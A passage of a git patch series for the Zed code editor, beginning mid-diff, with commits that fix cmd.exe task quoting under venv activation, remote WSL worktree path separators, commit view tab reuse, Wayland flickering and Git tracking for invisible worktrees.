remote_client.upgrade() else { - return; - }; - - log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); - remote_client.update(cx, |client, cx| { - client.force_heartbeat_timeout(0, cx); - }); - } - }); - - let remote_client = remote_client.downgrade(); - workspace.register_action(move |_, _: &SimulateTimeoutExhausted, _window, cx| { - let Some(remote_client) = remote_client.upgrade() else { - return; - }; - - log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); - remote_client.update(cx, |client, cx| { - client.force_heartbeat_timeout(remote::remote_client::MAX_RECONNECT_ATTEMPTS, cx); - }); - }); - }) - .detach(); -} +use gpui::TaskExt; +use workspace::Workspace; +use zed_actions::remote_debug::{SimulateDisconnect, SimulateTimeout, SimulateTimeoutExhausted}; + +pub fn init(cx: &mut gpui::App) { + cx.observe_new(|workspace: &mut Workspace, _, cx| { + let project = workspace.project().read(cx); + let Some(remote_client) = project.remote_client() else { + return; + }; + + workspace.register_action({ + let remote_client = remote_client.downgrade(); + move |_, _: &SimulateDisconnect, _window, cx| { + let Some(remote_client) = remote_client.upgrade() else { + return; + }; + + log::info!("SimulateDisconnect: forcing disconnect from remote server"); + remote_client.update(cx, |client, cx| { + client.force_disconnect(cx).detach_and_log_err(cx); + }); + } + }); + + workspace.register_action({ + let remote_client = remote_client.downgrade(); + move |_, _: &SimulateTimeout, _window, cx| { + let Some(remote_client) = remote_client.upgrade() else { + return; + }; + + log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); + remote_client.update(cx, |client, cx| { + client.force_heartbeat_timeout(0, cx); + }); + } + }); + + let remote_client = remote_client.downgrade(); + workspace.register_action(move |_, _: &SimulateTimeoutExhausted, _window, cx| { + let Some(remote_client) = remote_client.upgrade() 
else { + return; + }; + + log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); + remote_client.update(cx, |client, cx| { + client.force_heartbeat_timeout(remote::remote_client::MAX_RECONNECT_ATTEMPTS, cx); + }); + }); + }) + .detach(); +} From ba731fbb981f73012f10ca7bdb4a9fbd9ea02bc6 Mon Sep 17 00:00:00 2001 From: sunwukk990 <82385875+grgwuk990@users.noreply.github.com> Date: Tue, 5 May 2026 19:20:14 -0400 Subject: [PATCH 215/231] project: Fix cmd task quoting with venv activation (#55531) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55022 ## Summary When a task explicitly uses `cmd.exe`, Zed prepares it as a shell invocation like `cmd.exe /S /C ""`. If Python virtual environment activation is enabled, `Project::create_terminal_task` wraps that prepared task in an outer activation shell so the venv can be activated before the task runs. Before this change, the activation formatter treated the prepared `/C` command string as a normal shell argument and quoted it again. On Windows, that can make cmd receive escaped quotes literally, producing errors like `'\\"echo Hi there\\"' is not recognized...`. This preserves the prepared cmd `/C` command string while building the activation command, and keeps the existing quoting path for ordinary task arguments. ## Verification - `cargo test -p project formats_prepared_cmd_task` - `cargo test -p project formats_non_cmd_task_for_activation` - `cargo check -p project` - `cargo fmt --check --package project` - Manually verified on Windows with a selected Python `.venv` that a `cmd.exe` task prints `Hi there` and finishes successfully. 
Release Notes: - Fixed Windows `cmd.exe` tasks failing when run with a selected Python virtual environment. --- crates/project/src/terminals.rs | 179 +++++++++++++++++++++++++++++--- 1 file changed, 163 insertions(+), 16 deletions(-) diff --git a/crates/project/src/terminals.rs b/crates/project/src/terminals.rs index aa0f94ef7078f3..b0fc16f3c83168 100644 --- a/crates/project/src/terminals.rs +++ b/crates/project/src/terminals.rs @@ -9,6 +9,7 @@ use language::LanguageName; use remote::RemoteClient; use settings::{Settings, SettingsLocation}; use std::{ + borrow::Cow, path::{Path, PathBuf}, sync::Arc, }; @@ -156,23 +157,18 @@ impl Project { let builder = project .update(cx, move |_, cx| { - let format_to_run = || { - if let Some(command) = &spawn_task.command { - let command = shell_kind.prepend_command_prefix(command); - let command = shell_kind.try_quote_prefix_aware(&command); - let args = spawn_task - .args - .iter() - .filter_map(|arg| shell_kind.try_quote(&arg)); - - command.into_iter().chain(args).join(" ") - } else { - // todo: this breaks for remotes to windows - format!("exec {shell} -l") - } + let format_to_run = |spawn_task: &SpawnInTerminal| { + format_task_for_activation( + spawn_task, + shell_kind, + &shell, + path_style.is_windows(), + ) }; let (shell, env) = { + let to_run = + (!activation_script.is_empty()).then(|| format_to_run(&spawn_task)); env.extend(spawn_task.env); match remote_client { Some(remote_client) => match activation_script.clone() { @@ -180,7 +176,7 @@ impl Project { let separator = shell_kind.sequential_commands_separator(); let activation_script = activation_script.join(&format!("{separator} ")); - let to_run = format_to_run(); + let to_run = to_run.expect("activation command was formatted"); let arg = format!("{activation_script}{separator} {to_run}"); let args = shell_kind.args_for_shell(true, arg); @@ -213,7 +209,7 @@ impl Project { let separator = shell_kind.sequential_commands_separator(); let activation_script = 
activation_script.join(&format!("{separator} ")); - let to_run = format_to_run(); + let to_run = to_run.expect("activation command was formatted"); let arg = format!("{activation_script}{separator} {to_run}"); let args = shell_kind.args_for_shell(true, arg); @@ -644,3 +640,154 @@ fn create_remote_shell( command.env, )) } + +fn format_task_for_activation( + spawn_task: &SpawnInTerminal, + shell_kind: ShellKind, + shell: &str, + is_windows: bool, +) -> String { + if let Some(command) = &spawn_task.command { + let command = shell_kind.prepend_command_prefix(command); + let command = shell_kind.try_quote_prefix_aware(&command); + let args = spawn_task + .args + .iter() + .enumerate() + .filter_map(|(index, arg)| { + quote_prepared_task_arg_for_activation( + spawn_task, shell_kind, arg, index, is_windows, + ) + }); + + command.into_iter().chain(args).join(" ") + } else { + // todo: this breaks for remotes to windows + format!("exec {shell} -l") + } +} + +fn quote_prepared_task_arg_for_activation<'a>( + spawn_task: &SpawnInTerminal, + shell_kind: ShellKind, + arg: &'a str, + index: usize, + is_windows: bool, +) -> Option> { + if spawn_task.shell.shell_kind(is_windows) == ShellKind::Cmd + && index >= 2 + && spawn_task + .args + .get(index - 2) + .is_some_and(|arg| arg.eq_ignore_ascii_case("/S")) + && spawn_task + .args + .get(index - 1) + .is_some_and(|arg| arg.eq_ignore_ascii_case("/C")) + { + // The /C argument is already a cmd command string from prepare_task_for_spawn. + // Quoting it again for venv activation makes cmd see the quotes as literals. 
+ return quote_cmd_command_arg_for_outer_shell(arg, shell_kind).map(Cow::Owned); + } + + shell_kind.try_quote(arg) +} + +fn quote_cmd_command_arg_for_outer_shell(arg: &str, shell_kind: ShellKind) -> Option { + match shell_kind { + ShellKind::PowerShell | ShellKind::Pwsh => Some(format!("'{}'", arg.replace('\'', "''"))), + ShellKind::Cmd => Some(arg.to_string()), + ShellKind::Posix + | ShellKind::Csh + | ShellKind::Tcsh + | ShellKind::Fish + | ShellKind::Nushell + | ShellKind::Rc + | ShellKind::Xonsh + | ShellKind::Elvish => shell_kind.try_quote(arg).map(Cow::into_owned), + } +} + +#[cfg(test)] +mod tests { + use super::*; + use pretty_assertions::assert_eq; + + fn prepared_cmd_task(command_arg: &str) -> SpawnInTerminal { + SpawnInTerminal { + command: Some("cmd.exe".to_string()), + args: vec!["/S".to_string(), "/C".to_string(), command_arg.to_string()], + shell: Shell::Program("cmd.exe".to_string()), + ..SpawnInTerminal::default() + } + } + + #[test] + fn formats_prepared_cmd_task_for_powershell_activation() { + let task = prepared_cmd_task("\"echo Hi there\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cmd.exe /S /C '\"echo Hi there\"'" + ); + } + + #[test] + fn formats_prepared_cmd_task_for_cmd_activation() { + let task = prepared_cmd_task("\"echo Hi there\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::Cmd, "cmd.exe", true), + "cmd.exe /S /C \"echo Hi there\"" + ); + } + + #[test] + fn formats_prepared_cmd_task_with_shell_args_for_activation() { + let task = SpawnInTerminal { + command: Some("cmd.exe".to_string()), + args: vec![ + "/D".to_string(), + "/S".to_string(), + "/C".to_string(), + "\"echo Hi there\"".to_string(), + ], + shell: Shell::WithArguments { + program: "cmd.exe".to_string(), + args: vec!["/D".to_string()], + title_override: None, + }, + ..SpawnInTerminal::default() + }; + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", 
true), + "&cmd.exe /D /S /C '\"echo Hi there\"'" + ); + } + + #[test] + fn formats_prepared_cmd_task_with_single_quote_for_powershell_activation() { + let task = prepared_cmd_task("\"echo It's fine\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cmd.exe /S /C '\"echo It''s fine\"'" + ); + } + + #[test] + fn formats_non_cmd_task_for_activation() { + let task = SpawnInTerminal { + command: Some("cargo".to_string()), + args: vec!["test".to_string(), "some test".to_string()], + shell: Shell::System, + ..SpawnInTerminal::default() + }; + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cargo test 'some test'" + ); + } +} From e23217c77dad77bc65293454978e0fe7d4b22d62 Mon Sep 17 00:00:00 2001 From: hayatosc <145091553+hayatosc@users.noreply.github.com> Date: Wed, 6 May 2026 09:06:51 +0900 Subject: [PATCH 216/231] Fix remote worktree path separators (#55486) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54641 Release Notes: - Fixed creating git worktrees in WSL remote projects from Windows. ## Summary - Preserve the repository `PathStyle` when constructing git worktree paths. - Avoid using local OS path separators when creating worktrees for remote Posix projects such as WSL. - Keep worktree archive path checks aligned with the same path-style-aware worktree directory calculation. ## Root Cause Remote repository paths are stored as `PathBuf`s, but `PathBuf::join` and related path operations use the client OS separator. 
On Windows clients connected to WSL, this could turn a remote Linux path into a mixed path like `/home//\home\\dev\worktrees\...`, causing worktree creation and opening to fail. ## Validation - `cargo fmt --all --check` - `git diff --check` - `cargo test -p project test_new_worktree_path_uses_posix_style_for_remote_paths` - `cargo test -p project test_worktree_directory_uses_remote_path_style` - `cargo test -p project test_join_path_for_style_uses_remote_separator` --------- Co-authored-by: Max Brunsfeld --- .../agent_ui/src/thread_worktree_archive.rs | 12 ++- crates/project/src/git_store.rs | 55 +++++++++--- crates/project/tests/integration/git_store.rs | 42 ++++++--- crates/util/src/paths.rs | 90 +++++++++++++++++++ 4 files changed, 172 insertions(+), 27 deletions(-) diff --git a/crates/agent_ui/src/thread_worktree_archive.rs b/crates/agent_ui/src/thread_worktree_archive.rs index 73b0a426b3097b..b510da96b4e65c 100644 --- a/crates/agent_ui/src/thread_worktree_archive.rs +++ b/crates/agent_ui/src/thread_worktree_archive.rs @@ -12,7 +12,7 @@ use project::{ }; use remote::{RemoteConnectionOptions, same_remote_connection_identity}; use settings::Settings; -use util::ResultExt; +use util::{ResultExt, paths::PathStyle}; use workspace::{AppState, MultiWorkspace, Workspace}; use crate::thread_metadata_store::{ArchivedGitWorktree, ThreadId, ThreadMetadataStore}; @@ -77,9 +77,13 @@ fn archived_worktree_ref_name(id: i64) -> String { /// This intentionally reads the *global* `git.worktree_directory` setting /// rather than any project-local override, because Zed always uses the /// global value when creating worktrees and the archive check must match. 
-fn worktrees_base_for_repo(main_repo_path: &Path, cx: &App) -> Option { +fn worktrees_base_for_repo( + main_repo_path: &Path, + path_style: PathStyle, + cx: &App, +) -> Option { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - worktrees_directory_for_repo(main_repo_path, setting).log_err() + worktrees_directory_for_repo(main_repo_path, setting, path_style).log_err() } /// Builds a [`RootPlan`] for archiving the git worktree at `path`. @@ -165,7 +169,7 @@ pub fn build_root_plan( // Only archive worktrees that live inside the Zed-managed worktrees // directory (configured via `git.worktree_directory`). Worktrees the // user created outside that directory should be left untouched. - let worktrees_base = worktrees_base_for_repo(&main_repo_path, cx)?; + let worktrees_base = worktrees_base_for_repo(&main_repo_path, linked_snapshot.path_style, cx)?; if !path.starts_with(&worktrees_base) { return None; } diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 8f49e4c91832c0..b39f24bb4ced02 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -6824,10 +6824,15 @@ impl Repository { .unwrap_or(self.common_dir_abs_path.as_ref()); let project_name = repository_anchor .file_name() + .and_then(|name| name.to_str()) .ok_or_else(|| anyhow!("git repo must have a directory name"))?; - let directory = - worktrees_directory_for_repo(repository_anchor, worktree_directory_setting)?; - Ok(directory.join(branch_name).join(project_name)) + let directory = worktrees_directory_for_repo( + repository_anchor, + worktree_directory_setting, + self.path_style, + )?; + let directory = self.path_style.join_path(&directory, branch_name)?; + self.path_style.join_path(&directory, project_name) } pub fn worktrees(&mut self) -> oneshot::Receiver>> { @@ -7123,7 +7128,12 @@ impl Repository { let managed_worktree_base = cx.update(|cx| { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - 
worktrees_directory_for_repo(&repository_anchor_path, setting).log_err() + worktrees_directory_for_repo( + &repository_anchor_path, + setting, + PathStyle::local(), + ) + .log_err() }); if let Some(managed_worktree_base) = managed_worktree_base { @@ -8145,14 +8155,14 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti pub fn worktrees_directory_for_repo( repository_anchor_path: &Path, worktree_directory_setting: &str, + path_style: PathStyle, ) -> Result { // Check the original setting before trimming, since a path like "///" // is absolute but becomes "" after stripping trailing separators. // Also check for leading `/` or `\` explicitly, because on Windows // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` // would slip through even though it's clearly not a relative path. - if Path::new(worktree_directory_setting).is_absolute() - || worktree_directory_setting.starts_with('/') + if path_style.is_absolute(worktree_directory_setting) || worktree_directory_setting.starts_with('\\') { anyhow::bail!( @@ -8169,12 +8179,19 @@ pub fn worktrees_directory_for_repo( anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); } - let joined = repository_anchor_path.join(trimmed); - let resolved = util::normalize_path(&joined); + let joined = path_style.join_path(repository_anchor_path, trimmed)?; + let resolved = if path_style.is_posix() { + joined + } else { + util::normalize_path(&joined) + }; let resolved = if resolved.starts_with(repository_anchor_path) { resolved - } else if let Some(repo_dir_name) = repository_anchor_path.file_name() { - resolved.join(repo_dir_name) + } else if let Some(repo_dir_name) = repository_anchor_path + .file_name() + .and_then(|name| name.to_str()) + { + path_style.join_path(&resolved, repo_dir_name)? 
} else { resolved }; @@ -8659,7 +8676,7 @@ mod tests { use rand::{SeedableRng, rngs::StdRng}; use serde_json::json; use settings::SettingsStore; - use std::path::Path; + use std::path::{Path, PathBuf}; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { @@ -8668,6 +8685,22 @@ mod tests { }); } + #[test] + fn test_new_worktree_path_uses_posix_style_for_remote_paths() { + let work_dir = Path::new("/home/user/dev/lsp-tests"); + let directory = + worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).unwrap(); + let directory = PathStyle::Posix + .join_path(&directory, "nimble-sky") + .unwrap(); + let path = PathStyle::Posix.join_path(&directory, "lsp-tests").unwrap(); + + assert_eq!( + path, + PathBuf::from("/home/user/dev/worktrees/lsp-tests/nimble-sky/lsp-tests") + ); + } + fn verify_invariants(repository: &Repository) -> anyhow::Result<()> { match &repository.commit_data_handler { CommitDataHandlerState::Open(handler) => { diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 3f752a279f237c..05d3843f0187f5 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1182,7 +1182,7 @@ mod git_worktrees { use serde_json::json; use settings::SettingsStore; use std::path::{Path, PathBuf}; - use util::path; + use util::{path, paths::PathStyle}; fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -1198,43 +1198,61 @@ mod git_worktrees { let work_dir = Path::new("/code/my-project"); // Valid: sibling - assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok()); + assert!(worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).is_ok()); // Valid: subdirectory - assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok()); - assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok()); + assert!( + worktrees_directory_for_repo(work_dir, ".git/zed-worktrees", 
PathStyle::Posix).is_ok() + ); + assert!(worktrees_directory_for_repo(work_dir, "my-worktrees", PathStyle::Posix).is_ok()); // Invalid: just ".." would resolve back to the working directory itself - let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "..", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); // Invalid: ".." with trailing separators - let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "..\\", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); - let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "../", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); // Invalid: empty string would resolve to the working directory itself - let err = worktrees_directory_for_repo(work_dir, "").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be empty")); // Invalid: absolute path - let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err(); + let err = + worktrees_directory_for_repo(work_dir, "/tmp/worktrees", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: "/" is absolute on Unix - let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "/", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: "///" is absolute - let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "///", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: escapes too far up - let err = 
worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err(); + let err = + worktrees_directory_for_repo(work_dir, "../../other-project/wt", PathStyle::Posix) + .unwrap_err(); assert!(err.to_string().contains("outside")); } + #[test] + fn test_worktree_directory_uses_remote_path_style() { + let work_dir = Path::new("/home/user/dev/lsp-tests"); + + let directory = + worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).unwrap(); + + assert_eq!( + directory, + PathBuf::from("/home/user/dev/worktrees/lsp-tests") + ); + } + #[gpui::test] async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/util/src/paths.rs b/crates/util/src/paths.rs index 94877af090fb77..d0baca0f4765c7 100644 --- a/crates/util/src/paths.rs +++ b/crates/util/src/paths.rs @@ -416,6 +416,68 @@ impl PathStyle { } } + pub fn join_path( + self, + left: impl AsRef, + right: impl AsRef, + ) -> anyhow::Result { + let left = left + .as_ref() + .to_str() + .ok_or_else(|| anyhow::anyhow!("Path contains invalid UTF-8"))?; + let right = right.as_ref(); + let right_string = right + .to_str() + .ok_or_else(|| anyhow::anyhow!("Path contains invalid UTF-8"))?; + let joined = self + .join(left, right_string) + .ok_or_else(|| anyhow::anyhow!("Path must be relative: {right:?}"))?; + Ok(PathBuf::from(self.normalize(&joined))) + } + + pub fn normalize(self, path_like: &str) -> String { + match self { + PathStyle::Windows => crate::normalize_path(Path::new(path_like)) + .to_string_lossy() + .into_owned(), + PathStyle::Posix => { + let is_absolute = path_like.starts_with('/'); + let remainder = if is_absolute { + path_like.trim_start_matches('/') + } else { + path_like + }; + + let mut components = Vec::new(); + for component in remainder.split(self.separators_ch()) { + match component { + "" | "." => {} + ".." 
=> { + if components + .last() + .is_some_and(|component| *component != "..") + { + components.pop(); + } else if !is_absolute { + components.push(component); + } + } + component => components.push(component), + } + } + + let normalized = components.join(self.primary_separator()); + if is_absolute && normalized.is_empty() { + "/".to_string() + } else if is_absolute { + format!("/{normalized}") + } else { + normalized + } + } + } + } + pub fn split(self, path_like: &str) -> (Option<&str>, &str) { let Some(pos) = path_like.rfind(self.primary_separator()) else { return (None, path_like); @@ -1566,6 +1628,34 @@ mod tests { use super::*; use util_macros::perf; + #[test] + fn test_join_path_uses_path_style_separator() { + let posix_path = PathStyle::Posix + .join_path(Path::new("/home/user/dev"), "worktrees") + .unwrap(); + let windows_path = PathStyle::Windows + .join_path(Path::new("C:\\Users\\user\\dev"), "worktrees") + .unwrap(); + + assert_eq!(posix_path, PathBuf::from("/home/user/dev/worktrees")); + assert_eq!( + windows_path.to_string_lossy(), + "C:\\Users\\user\\dev\\worktrees" + ); + } + + #[test] + fn test_normalize_uses_path_style_separator() { + assert_eq!( + PathStyle::Posix.normalize("/home/user/dev/../worktrees/./zed"), + "/home/user/worktrees/zed" + ); + assert_eq!( + PathStyle::Windows.normalize("C:\\Users\\user\\dev\\worktrees"), + "C:\\Users\\user\\dev\\worktrees" + ); + } + fn rel_path_entry(path: &'static str, is_file: bool) -> (&'static RelPath, bool) { (RelPath::unix(path).unwrap(), is_file) } From 3df3acba40301c0a3e77ad1460b5e870db123b18 Mon Sep 17 00:00:00 2001 From: Jake Norris Date: Tue, 5 May 2026 21:49:36 -0400 Subject: [PATCH 217/231] Fix git graph file diff view opening wrong file if a previous one is already open (#55595) Fixed the portion of the open() function of the CommitView struct that checked to see if the commit view was already open in a tab. 
Previously, it did not account for files being filtered, and called pane.activate_item() when it found a matching commit SHA open. Now, the pane item is deleted and replaced with the new CommitView, respecting the position of the tab. This allows for the filtered files to be updated and work according to the expectations laid out in the mentioned issue. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55446 Release Notes: - Fix git graph file diff view opening wrong file if a previous one is already open --------- Co-authored-by: Christopher Biscardi --- crates/git_ui/src/commit_view.rs | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/crates/git_ui/src/commit_view.rs b/crates/git_ui/src/commit_view.rs index 19dea7adafea3c..c39c175e32c09e 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -201,7 +201,21 @@ impl CommitView { .is_some_and(|view| view.read(cx).commit.sha == commit_sha) }); if let Some(ix) = ix { - pane.activate_item(ix, true, true, window, cx); + let existing = pane + .items() + .filter_map(|item| item.downcast::()) + .find(|view| view.read(cx).commit.sha == commit_sha) + .unwrap(); + + pane.remove_item(existing.item_id(), false, false, window, cx); + pane.add_item( + Box::new(commit_view), + true, + true, + Some(ix), + window, + cx, + ); } else { pane.add_item(Box::new(commit_view), true, true, None, window, cx); } From 99dba6458653eaf57a46436307b146a0f3ce1b6e Mon Sep 17 00:00:00 2001 From: b5l <35809732+b5l@users.noreply.github.com> Date: Wed, 6 May 2026 05:40:02 +0200 Subject: [PATCH 218/231] gpui_linux: Fix Wayland flickering under 
CPU load by skipping redundant surface commit (#54214) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #32792 Closes #38266 Closes #54133 Release Notes: - Fixed graphical corruption that could occur when using Wayland ---- **What**: Fixes flickering on Wayland (Sway/wlroots) under CPU load (e.g. rust-analyzer running). The bug only reproduces in release builds - debug builds are too slow to hit the race window. Environment where this was reproduced: Intel GPU (both Xe KMD and i915), Mesa 26.0.4, Sway 1.11. **Why**: When wgpu presents a frame on Wayland+Vulkan, it calls `vkQueuePresentKHR,` which - as required by the Vulkan spec - synchronously issues `wl_surface.attach`, `wl_surface.damage`, and `wl_surface.commit` to the compositor before returning. The commit also picks up any pending frame callbacks. Zed's `completed_frame()` independently calls `state.surface.commit()`. This is a redundant second commit on the same surface. Under load, the Wayland socket dispatch can be delayed enough that both commits are in flight in close succession, and the ordering becomes timing-dependent. When Zed's commit reaches the compositor before Mesa's attach+commit sequence has been fully flushed, the compositor sees a commit with no buffer attached, fires `wl_callback::Done` immediately, and Zed starts the next frame too early - Mesa's real buffer arrives late, causing the visible flicker. Under no load, Mesa's synchronous commit consistently reaches the compositor first, so the bug doesn't appear. **Fix**: Track whether `renderer.draw()` actually called `frame.present()`. 
When it did, Mesa owns the `wl_surface.commit()` for that frame - skip Zed's commit in `completed_frame()`. Only commit ourselves when wgpu didn't present (surface not configured, lost, occluded, etc.) - in those cases Mesa won't commit, and we need to keep the frame callback alive. --------- Co-authored-by: Benjamin Laib Co-authored-by: John Tur --- crates/gpui_linux/src/linux/wayland/window.rs | 15 ++++++++++++--- crates/gpui_wgpu/src/wgpu_renderer.rs | 18 +++++++++--------- 2 files changed, 21 insertions(+), 12 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 857289a1d9708a..37d0f492d25caf 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -117,6 +117,7 @@ pub struct WaylandWindowState { active: bool, hovered: bool, pub(crate) force_render_after_recovery: bool, + renderer_presented: bool, in_progress_configure: Option, resize_throttle: bool, in_progress_window_controls: Option, @@ -392,6 +393,7 @@ impl WaylandWindowState { active: false, hovered: false, force_render_after_recovery: false, + renderer_presented: false, in_progress_window_controls: None, window_controls: WindowControls::default(), client_inset: None, @@ -1398,7 +1400,7 @@ impl PlatformWindow for WaylandWindow { return; } - state.renderer.draw(scene); + state.renderer_presented = state.renderer.draw(scene); if state.renderer.needs_redraw() { state.force_render_after_recovery = true; @@ -1406,8 +1408,15 @@ impl PlatformWindow for WaylandWindow { } fn completed_frame(&self) { - let state = self.borrow(); - state.surface.commit(); + let mut state = self.borrow_mut(); + + // Work around a bug in old versions of wlroots where committing without a buffer attached + // can cause invalid synchronization that leads to graphical corruption. 
+ if !state.renderer_presented { + state.surface.commit(); + } + + state.renderer_presented = false; } fn sprite_atlas(&self) -> Arc { diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index da7e71c726b791..08f30dc0090d3a 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1079,13 +1079,13 @@ impl WgpuRenderer { self.max_texture_size } - pub fn draw(&mut self, scene: &Scene) { + pub fn draw(&mut self, scene: &Scene) -> bool { // Bail out early if the surface has been unconfigured (e.g. during // Android background/rotation transitions). Attempting to acquire // a texture from an unconfigured surface can block indefinitely on // some drivers (Adreno). if !self.surface_configured { - return; + return false; } let last_error = self.last_error.lock().unwrap().take(); @@ -1106,7 +1106,7 @@ impl WgpuRenderer { self.atlas.clear(); self.needs_redraw = true; self.failed_frame_count = 0; - return; + return false; } } else { self.failed_frame_count = 0; @@ -1124,7 +1124,7 @@ impl WgpuRenderer { resources .surface .configure(&resources.device, &surface_config); - return; + return false; } wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => { let surface_config = self.surface_config.clone(); @@ -1132,15 +1132,15 @@ impl WgpuRenderer { resources .surface .configure(&resources.device, &surface_config); - return; + return false; } wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => { - return; + return false; } wgpu::CurrentSurfaceTexture::Validation => { *self.last_error.lock().unwrap() = Some("Surface texture validation error".to_string()); - return; + return false; } }; @@ -1321,7 +1321,7 @@ impl WgpuRenderer { self.instance_buffer_capacity ); frame.present(); - return; + return true; } self.grow_instance_buffer(); continue; @@ -1331,7 +1331,7 @@ impl WgpuRenderer { .queue .submit(std::iter::once(encoder.finish())); frame.present(); - 
return; + return true; } } From 0540e541835124ad8c169adc66c49540aa82b317 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Wed, 6 May 2026 08:57:06 +0200 Subject: [PATCH 219/231] Skip Git tracking for invisible worktrees (#55760) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/project/src/git_store.rs | 7 -- crates/worktree/src/worktree.rs | 110 +++++++++++++--------- crates/worktree/tests/integration/main.rs | 44 +++++++++ 3 files changed, 109 insertions(+), 52 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index b39f24bb4ced02..509d694885b1ad 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -1495,13 +1495,6 @@ impl GitStore { else { return; }; - if !worktree.read(cx).is_visible() { - log::debug!( - "not adding repositories for local worktree {:?} because it's not visible", - worktree.read(cx).abs_path() - ); - return; - } self.update_repositories_from_worktree( *worktree_id, project_environment.clone(), diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 974219bf9bca4d..2b6129280986a2 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -414,9 +414,13 @@ impl Worktree { None }; - let root_repo_common_dir = discover_root_repo_common_dir(&abs_path, fs.as_ref()) - .await - .map(SanitizedPath::from_arc); + let root_repo_common_dir = if visible { + discover_root_repo_common_dir(&abs_path, fs.as_ref()) + .await + .map(SanitizedPath::from_arc) + } else { + None + }; 